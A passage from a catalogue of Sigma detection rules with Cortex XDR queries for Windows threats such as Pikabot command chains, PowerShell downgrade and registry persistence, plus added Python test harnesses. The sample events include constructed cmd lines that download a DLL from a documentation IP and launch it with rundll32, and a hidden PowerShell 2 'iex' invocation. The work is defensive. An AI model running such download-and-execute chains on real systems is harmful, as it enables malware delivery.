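    return tuple(s.lower() for s in items)

ADDIN_PATHS = _lower((                       # selection: TargetObject|contains
    "\\Software\\Microsoft\\Office\\Outlook\\Addins\\",
    "\\Software\\Microsoft\\Office\\Word\\Addins\\",
    "\\Software\\Microsoft\\Office\\Excel\\Addins\\",
    "\\Software\\Microsoft\\Office\\Powerpoint\\Addins\\",
    "\\Software\\Microsoft\\VSTO\\Security\\Inclusion\\",
))
SYSTEM_IMAGES = set(_lower((                 # filter_main_system
    "C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe",
    "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe",
)))
CLICK_TO_RUN_PREFIXES = _lower((             # filter_main_office_click_to_run
    "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\",
    "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\",
))
INTEGRATOR_IMAGES = set(_lower((             # filter_main_integrator
    "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe",
    "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe",
)))
OFFICE_PREFIXES = _lower((                   # filter_main_office_apps
    "C:\\Program Files\\Microsoft Office\\OFFICE",
    "C:\\Program Files (x86)\\Microsoft Office\\OFFICE",
    "C:\\Program Files\\Microsoft Office\\Root\\OFFICE",
    "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE",
    "C:\\PROGRA~2\\MICROS~2\\Office",
))
OFFICE_SUFFIXES = _lower((
    "\\excel.exe", "\\Integrator.exe", "\\OneNote.exe", "\\outlook.exe",
    "\\powerpnt.exe", "\\Teams.exe", "\\visio.exe", "\\winword.exe",
))
VSTO_PREFIXES = _lower((                     # filter_main_vsto
    "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\",
    "C:\\Program Files (x86)\\Microsoft Shared\\VSTO\\",
))
AV_FILTERS = (                               # filter_optional_*: (images, TargetObject fragment)
    (set(_lower(("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe",
                 "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe"))),
     "\\microsoft\\office\\outlook\\addins\\antivirus.asoutext\\"),
    (set(_lower(("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe",
                 "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe"))),
     "\\microsoft\\office\\outlook\\addins\\avast.asoutext\\"),
)


def selection(ev):
    target = ev.get("TargetObject", "").lower()
    return any(p in target for p in ADDIN_PATHS)


def filter_main(ev):
    img = ev.get("Image", "").lower()
    return (
        img in SYSTEM_IMAGES
        or (img.startswith(CLICK_TO_RUN_PREFIXES) and img.endswith("\\officeclicktorun.exe"))
        or img in INTEGRATOR_IMAGES
        or (img.startswith(OFFICE_PREFIXES) and img.endswith(OFFICE_SUFFIXES))
        or (img.startswith(VSTO_PREFIXES) and img.endswith("\\vstoinstaller.exe"))
    )


def filter_optional(ev):
    img = ev.get("Image", "").lower()
    target = ev.get("TargetObject", "").lower()
    return any(img in images and fragment in target for images, fragment in AV_FILTERS)


def matches(ev):
    # condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
    return selection(ev) and not filter_main(ev) and not filter_optional(ev)


# Constructed events, not real telemetry: an unknown binary in a user's temp dir,
# a Windows Installer run, Outlook itself, AVG's installer, and reg.exe writing a
# VSTO inclusion-list entry (dummy GUID).
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",
     "TargetObject": "HKCU\\Software\\Microsoft\\Office\\Outlook\\Addins\\SyncHelper\\LoadBehavior"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Office\\Word\\Addins\\Acrobat.PDFMaker\\LoadBehavior"},
    {"Image": "C:\\Program Files\\Microsoft Office\\Root\\Office16\\OUTLOOK.EXE",
     "TargetObject": "HKCU\\Software\\Microsoft\\Office\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1\\LoadBehavior"},
    {"Image": "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt\\LoadBehavior"},
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKCU\\Software\\Microsoft\\VSTO\\Security\\Inclusion\\{00000000-0000-0000-0000-000000000001}\\Url"},
]


def run(events=SAMPLE_EVENTS):
    """One boolean per event: True means the rule would alert."""
    return [matches(ev) for ev in events]
```

Only the first and last events alert: the installer, Outlook and the AVG registrar are all absorbed by the filters, which is exactly the list to extend when a new legitimate add-in installer shows up in your own telemetry.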
medium Strong Medium FP
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads: "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
status test author Alejandro Houspanossian ('@lekz86') ATT&CK sub-technique id e5144106-8198-4f6e-bfc2-0a551cc8dd94
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line contains "cmd" and 
 action_process_image_command_line contains "/c") and 
 (action_process_image_command_line in ("* & *", "* || *")) and 
 (action_process_image_command_line in ("* curl*", "* wget*", "* timeout *", "* ping *")) and 
 (action_process_image_command_line in ("* rundll32*", "* mkdir *"))))
view Sigma YAML
title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
status: test
description: |
    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads:
    "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "rundll32" is used to execute malicious DLL files.
    In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
references:
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
author: Alejandro Houspanossian ('@lekz86')
date: 2024-01-02
tags:
    - attack.command-and-control
    - attack.execution
    - attack.stealth
    - attack.t1059.003
    - attack.t1105
    - attack.t1218
    - detection.emerging-threats
logsource:
    product: windows
    category: process_creation
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'cmd'
            - '/c'
    selection_pipes:
        CommandLine|contains:
            - ' & '
            - ' || '
    selection_commands_1:
        CommandLine|contains:
            - ' curl'
            - ' wget'
            - ' timeout '
            - ' ping '
    selection_commands_2:
        CommandLine|contains:
            - ' rundll32'
            - ' mkdir '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
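The rule requires all four selections at once, so the order of the chained commands does not matter, but each token has to appear with the surrounding space the YAML specifies. The following added example (mine, not the rule author's) puts the four selections into one predicate and runs it over constructed command lines, including a benign backup one-liner that also fires and a chain written with "&&" that does not. None of the lines is real Pikabot telemetry and 198.51.100.7 is a documentation address.

```python
# Added example (not part of the rule corpus): the four Sigma selections of the
# Pikabot rule as one predicate over constructed command lines.

STAGE1_TOKENS = (" curl", " wget", " timeout ", " ping ")   # selection_commands_1
STAGE2_TOKENS = (" rundll32", " mkdir ")                     # selection_commands_2
CHAIN_TOKENS = (" & ", " || ")                               # selection_pipes


def pikabot_cmd_chain(cmdline):
    """True when every selection of the rule matches the command line."""
    c = cmdline.lower()
    has_cmd = "cmd" in c and "/c" in c                        # selection_cmd: contains|all
    has_chain = any(t in c for t in CHAIN_TOKENS)
    has_stage1 = any(t in c for t in STAGE1_TOKENS)
    has_stage2 = any(t in c for t in STAGE2_TOKENS)
    return has_cmd and has_chain and has_stage1 and has_stage2  # condition: all of selection_*


# Constructed command lines (not captured samples).
SAMPLES = {
    "download_then_rundll32": (
        "cmd.exe /c mkdir C:\\Users\\Public\\Libraries\\sync & "
        "curl -o C:\\Users\\Public\\Libraries\\sync\\s.dll http://198.51.100.7/s.dat & "
        "rundll32 C:\\Users\\Public\\Libraries\\sync\\s.dll,Crash"
    ),
    "delay_then_rundll32": "cmd /c ping 127.0.0.1 -n 5 & rundll32.exe C:\\ProgramData\\u.dll,Enter",
    # Benign admin one-liner that still satisfies all four selections.
    "backup_script": "cmd.exe /c mkdir D:\\backup & timeout 5 & robocopy C:\\data D:\\backup",
    # Same stages, but chained with '&&': ' & ' and ' || ' are the only pipes the rule lists.
    "double_ampersand": (
        "cmd /c curl -o C:\\ProgramData\\x.dat http://198.51.100.7/x && "
        "rundll32 C:\\ProgramData\\x.dat,Run"
    ),
    # No cmd /c wrapper at all.
    "no_cmd_wrapper": "powershell -c curl http://198.51.100.7/x -o x.dat; rundll32 x.dat,Run",
}


def evaluate(samples=SAMPLES):
    """Map each sample name to whether the rule fires on it."""
    return {name: pikabot_cmd_chain(cmd) for name, cmd in samples.items()}
```

The backup script firing is what the Medium FP tier looks like in practice. The "&&" case shows a gap in the other direction: selection_pipes lists only " & " and " || ", so a chain written with "&&" or with no spaces around the operator is outside the rule until you add those tokens to your copy.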
medium Moderate High FP
Potential PowerShell Console History Access Attempt via History File
Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
status experimental author Luc Génaux ATT&CK sub-technique id f4ff7323-b5fc-4323-8b52-6b9408e15788
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line in ("*ConsoleHost_history.txt*", "*(Get-PSReadLineOption).HistorySavePath*")))
view Sigma YAML
title: Potential PowerShell Console History Access Attempt via History File
id: f4ff7323-b5fc-4323-8b52-6b9408e15788
status: experimental
description: |
    Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
    This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
references:
    - https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html
author: Luc Génaux
date: 2025-04-03
tags:
    - attack.credential-access
    - attack.t1552.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'ConsoleHost_history.txt'
            - '(Get-PSReadLineOption).HistorySavePath'
    condition: selection
falsepositives:
    - Legitimate access of the console history file is possible
level: medium
medium Moderate Medium FP
Potential PowerShell Downgrade Attack
Detects a PowerShell downgrade attack, in which "powershell.exe" is started with the "-version 2" flag (or one of its abbreviations) to force the PowerShell 2.0 engine, which lacks the script block logging and AMSI integration of later versions
status test author Harish Segar (rule) ATT&CK sub-technique id b3512211-c67e-4707-bedc-66efc7848863
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\powershell.exe" and 
 (action_process_image_command_line in ("* -version 2 *", "* -versio 2 *", "* -versi 2 *", "* -vers 2 *", "* -ver 2 *", "* -ve 2 *", "* -v 2 *"))))
view Sigma YAML
title: Potential PowerShell Downgrade Attack
id: b3512211-c67e-4707-bedc-66efc7848863
related:
    - id: 6331d09b-4785-4c13-980f-f96661356249
      type: derived
status: test
description: Detects a PowerShell downgrade attack, in which "powershell.exe" is started with the "-version 2" flag (or one of its abbreviations) to force the PowerShell 2.0 engine, which lacks the script block logging and AMSI integration of later versions
references:
    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-
author: Harish Segar (rule)
date: 2020-03-20
modified: 2023-01-04
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -version 2 '
            - ' -versio 2 '
            - ' -versi 2 '
            - ' -vers 2 '
            - ' -ver 2 '
            - ' -ve 2 '
            - ' -v 2 '
    condition: selection
falsepositives:
    - Unknown
level: medium
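The seven command-line strings are the prefixes of -Version that powershell.exe accepts, each wrapped in spaces. The following added example (mine, not the rule's) rebuilds that list programmatically and compares the rule against a tuned regex of my own that also catches the flag at the very end of the command line, the "2.0" spelling and the dash characters Sigma's windash modifier covers. The tuned pattern is a suggestion, not part of the corpus, and the command lines are constructed.

```python
import re

# Added example (not part of the rule corpus): the downgrade rule's flag list
# rebuilt from prefixes, next to a tuned regex that is this example's own suggestion.

FLAG_VARIANTS = (" -version 2 ", " -versio 2 ", " -versi 2 ", " -vers 2 ",
                 " -ver 2 ", " -ve 2 ", " -v 2 ")


def variants_from_prefixes(flag="version", shortest=1):
    """Rebuild the rule's list: every prefix of `flag`, longest first, down to one letter."""
    return tuple(f" -{flag[:n]} 2 " for n in range(len(flag), shortest - 1, -1))


def rule_matches(image, cmdline):
    """The rule as written: Image|endswith plus CommandLine|contains on the literal list."""
    c = cmdline.lower()
    return image.lower().endswith("\\powershell.exe") and any(v in c for v in FLAG_VARIANTS)


# Tuned form (assumption of this example, not the rule): same prefixes, but the flag may
# sit at the end of the line, '2' may be spelled '2.0', and the switch may start with any
# of the windash characters (-, /, en dash, em dash, horizontal bar).
TUNED = re.compile(
    r"(?:^|\s)[-/\u2013\u2014\u2015]v(?:e(?:r(?:s(?:i(?:o(?:n)?)?)?)?)?)?\s+2(?:\.0)?(?=\s|$)",
    re.IGNORECASE,
)


def tuned_matches(image, cmdline):
    return image.lower().endswith("\\powershell.exe") and TUNED.search(cmdline) is not None


POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PWSH = "C:\\Program Files\\PowerShell\\7\\pwsh.exe"
# Constructed command lines, not captured telemetry.
CASES = (
    (POWERSHELL, "powershell.exe -version 2 -nop -w hidden -c iex (gc C:\\Users\\Public\\s.txt)"),
    (POWERSHELL, "powershell.exe -v 2"),                  # flag last: no trailing space for ' -v 2 '
    (POWERSHELL, "powershell.exe -Version 2.0 -File C:\\Users\\Public\\s.ps1"),
    (PWSH, "pwsh.exe -v 2 "),                             # pwsh.exe is outside the Image filter
    (POWERSHELL, "powershell.exe -v 2016 -c Get-Date"),   # '2016' must not count as '2'
)


def compare(cases=CASES):
    """(rule result, tuned result) for each case."""
    return [(rule_matches(img, cmd), tuned_matches(img, cmd)) for img, cmd in cases]
```

Cases two and three are the ones to care about: the literal list needs a trailing space after the "2", so a command line that ends with the flag, or that spells the version "2.0", slips past the rule while the tuned pattern still fires. Before adopting the regex, check how your process-creation source terminates command lines, since some collectors trim trailing whitespace and others do not.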
medium Moderate Medium FP
Potential PowerShell Execution Policy Tampering
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id fad91067-08c5-4d1a-8d8c-d96a21b37814
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((action_registry_key_name in ("*\ShellIds\Microsoft.PowerShell\ExecutionPolicy", "*\Policies\Microsoft\Windows\PowerShell\ExecutionPolicy")) and 
 ((action_registry_value_name in ("*Bypass*", "*Unrestricted*")) or 
 (action_registry_data in ("*Bypass*", "*Unrestricted*")))) and 
 (not 
 (actor_process_image_path in ("*:\Windows\System32\*", "*:\Windows\SysWOW64\*")))))
view Sigma YAML
title: Potential PowerShell Execution Policy Tampering
id: fad91067-08c5-4d1a-8d8c-d96a21b37814
related:
    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry
      type: similar
    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet
      type: similar
    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock
      type: similar
status: test
description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
references:
    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-11
modified: 2023-12-14
tags:
    - attack.defense-impairment
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith:
            # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux
            # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there
            # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3
            - '\ShellIds\Microsoft.PowerShell\ExecutionPolicy'
            - '\Policies\Microsoft\Windows\PowerShell\ExecutionPolicy'
        Details|contains:
            - 'Bypass'
            - 'Unrestricted'
    filter_main_svchost:
        # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example.
        Image|contains:
            - ':\Windows\System32\'
            - ':\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential Process Execution Proxy Via CL_Invocation.ps1
Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process"
status test author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova ATT&CK technique id a0459f02-ac51-4c09-b511-b8c9203fc429
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_process_image_command_line contains "SyncInvoke ")
view Sigma YAML
title: Potential Process Execution Proxy Via CL_Invocation.ps1
id: a0459f02-ac51-4c09-b511-b8c9203fc429
status: test
description: Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process"
references:
    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/
    - https://twitter.com/bohops/status/948061991012327424
author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
date: 2020-10-14
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: As this function is usually called from within powershell, a classical process creation event would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example.
        CommandLine|contains: 'SyncInvoke '
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential Provlaunch.EXE Binary Proxy Execution Abuse
Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
status test author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel ATT&CK technique id 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\provlaunch.exe" and 
 (not 
 ((action_process_image_path in ("*\calc.exe", "*\cmd.exe", "*\cscript.exe", "*\mshta.exe", "*\notepad.exe", "*\powershell.exe", "*\pwsh.exe", "*\regsvr32.exe", "*\rundll32.exe", "*\wscript.exe")) or 
 (action_process_image_path in ("*:\PerfLogs\*", "*:\Temp\*", "*:\Users\Public\*", "*\AppData\Temp\*", "*\Windows\System32\Tasks\*", "*\Windows\Tasks\*", "*\Windows\Temp\*"))))))
view Sigma YAML
title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c
related:
    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse
      type: similar
    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry
      type: similar
    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry
      type: similar
status: test
description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    - https://twitter.com/0gtweet/status/1674399582162153472
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
date: 2023-08-08
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\provlaunch.exe'
    filter_main_covered_children:
        # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd
        - Image|endswith:
              - '\calc.exe'
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\notepad.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - Image|contains:
              - ':\PerfLogs\'
              - ':\Temp\'
              - ':\Users\Public\'
              - '\AppData\Temp\'
              - '\Windows\System32\Tasks\'
              - '\Windows\Tasks\'
              - '\Windows\Temp\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Potential Registry Persistence Attempt Via DbgManagedDebugger
Detects the setting of the "DbgManagedDebugger" value under the "\Microsoft\.NETFramework" key. The value names the debugger that is launched when a managed (.NET) application crashes, which makes it usable for persistence.
status test author frack113 ATT&CK technique id 9827ae57-3802-418f-994b-d5ecf5cd974b
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\Microsoft\.NETFramework\DbgManagedDebugger" and 
 (not 
 (action_registry_value_name = "\"C:\Windows\system32\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d" or 
 action_registry_data = "\"C:\Windows\system32\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))))
view Sigma YAML
title: Potential Registry Persistence Attempt Via DbgManagedDebugger
id: 9827ae57-3802-418f-994b-d5ecf5cd974b
status: test
description: Detects the setting of the "DbgManagedDebugger" value under the "\Microsoft\.NETFramework" key. The value names the debugger that is launched when a managed (.NET) application crashes, which makes it usable for persistence.
references:
    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
    - https://github.com/last-byte/PersistenceSniper
author: frack113
date: 2022-08-07
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Microsoft\.NETFramework\DbgManagedDebugger'
    filter:
        Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d'
    condition: selection and not filter
falsepositives:
    - Legitimate use of the value to set up a debugger, which is common on developer machines
level: medium
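This rule and the PowerShell execution policy tampering rule above both match a Sigma TargetObject whose last path component is a registry value name (DbgManagedDebugger, ExecutionPolicy), and both rendered queries compare that full path against action_registry_key_name. Cortex XDR carries the value name in its own field, action_registry_value_name, so whether a key-name comparison ever matches depends on whether your tenant's key field includes the value name or not. The following added example (mine, not the corpus's) implements both rules over constructed Sysmon-style events with 'Image', 'TargetObject' and 'Details' keys, splits the TargetObject the way the Cortex fields are laid out, and shows the key-only and the key-plus-value form of the execution policy check side by side.

```python
# Added example (not part of the rule corpus): the execution policy tampering rule
# and the DbgManagedDebugger rule over constructed registry_set events, plus the
# split of a Sysmon TargetObject into Cortex-style key name and value name.
# Assumption: events are dicts with 'Image', 'TargetObject' and 'Details'.

EXECUTION_POLICY_SUFFIXES = (
    "\\shellids\\microsoft.powershell\\executionpolicy",
    "\\policies\\microsoft\\windows\\powershell\\executionpolicy",
)
WEAK_POLICIES = ("bypass", "unrestricted")
SYSTEM_DIRS = (":\\windows\\system32\\", ":\\windows\\syswow64\\")   # filter_main_svchost

DBG_SUFFIX = "\\microsoft\\.netframework\\dbgmanageddebugger"
DEFAULT_JIT_DEBUGGER = '"C:\\Windows\\system32\\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d'


def split_target(target_object):
    """Sysmon TargetObject 'HKLM\\...\\Key\\ValueName' -> (key path, value name)."""
    key, _, value_name = target_object.rpartition("\\")
    return key, value_name


def to_cortex_fields(ev):
    """The same event with key, value name and data in separate fields."""
    key, value_name = split_target(ev["TargetObject"])
    return {
        "action_registry_key_name": key,
        "action_registry_value_name": value_name,
        "action_registry_data": ev.get("Details", ""),
    }


def execution_policy_tampering(ev):
    target = ev["TargetObject"].lower()
    details = ev.get("Details", "").lower()
    image = ev.get("Image", "").lower()
    selection = target.endswith(EXECUTION_POLICY_SUFFIXES) and any(w in details for w in WEAK_POLICIES)
    filter_main_svchost = any(d in image for d in SYSTEM_DIRS)
    return selection and not filter_main_svchost


def dbg_managed_debugger(ev):
    target = ev["TargetObject"].lower()
    details = ev.get("Details", "")
    return target.endswith(DBG_SUFFIX) and details.lower() != DEFAULT_JIT_DEBUGGER.lower()


def key_name_only_check(ev):
    """Execution policy check the way the rendered query phrases it: key name alone."""
    fields = to_cortex_fields(ev)
    return fields["action_registry_key_name"].lower().endswith(EXECUTION_POLICY_SUFFIXES)


def key_and_value_check(ev):
    """Field-aware form: key path without the value name, value name on its own."""
    fields = to_cortex_fields(ev)
    key = fields["action_registry_key_name"].lower()
    return (
        fields["action_registry_value_name"].lower() == "executionpolicy"
        and key.endswith(("\\shellids\\microsoft.powershell", "\\policies\\microsoft\\windows\\powershell"))
    )


RULES = (("exec_policy", execution_policy_tampering), ("dbg_managed_debugger", dbg_managed_debugger))

# Constructed events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\stage.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy",
     "Details": "Bypass"},
    {"Image": "C:\\Windows\\System32\\svchost.exe",          # group policy applying a setting
     "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy",
     "Details": "Unrestricted"},
    {"Image": "C:\\Users\\bob\\tools\\setup.exe",            # not a weak policy
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy",
     "Details": "RemoteSigned"},
    {"Image": "C:\\Windows\\Temp\\svc.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\DbgManagedDebugger",
     "Details": "C:\\Users\\Public\\helper.exe"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe",          # installer restoring the default
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\DbgManagedDebugger",
     "Details": DEFAULT_JIT_DEBUGGER},
]


def alerts(events=SAMPLE_EVENTS):
    """Names of the rules that fire, per event."""
    return [[name for name, rule in RULES if rule(ev)] for ev in events]
```

Confirm with one known-good event (for example a Set-ExecutionPolicy run on a test host) which of key_name_only_check and key_and_value_check fires in your tenant before trusting the rendered query, and translate the DbgManagedDebugger suffix the same way.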
medium Strong Medium FP
Potential Regsvr32 Commandline Flag Anomaly
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without "/n", which should be uncommon.
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id b236190c-1c61-41e9-84b3-3fe03f6d76b0
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\regsvr32.exe" and 
 (action_process_image_command_line contains " -i:" or 
 action_process_image_command_line contains " /i:" or 
 action_process_image_command_line contains " –i:" or 
 action_process_image_command_line contains " —i:" or 
 action_process_image_command_line contains " ―i:")) and 
 (not 
 (action_process_image_command_line contains " -n " or 
 action_process_image_command_line contains " /n " or 
 action_process_image_command_line contains " –n " or 
 action_process_image_command_line contains " —n " or 
 action_process_image_command_line contains " ―n "))))
view Sigma YAML
title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without "/n", which should be uncommon.
references:
    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -i:'
    filter_main_flag:
        CommandLine|contains|windash: ' -n '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrator typo might cause some false positives
level: medium
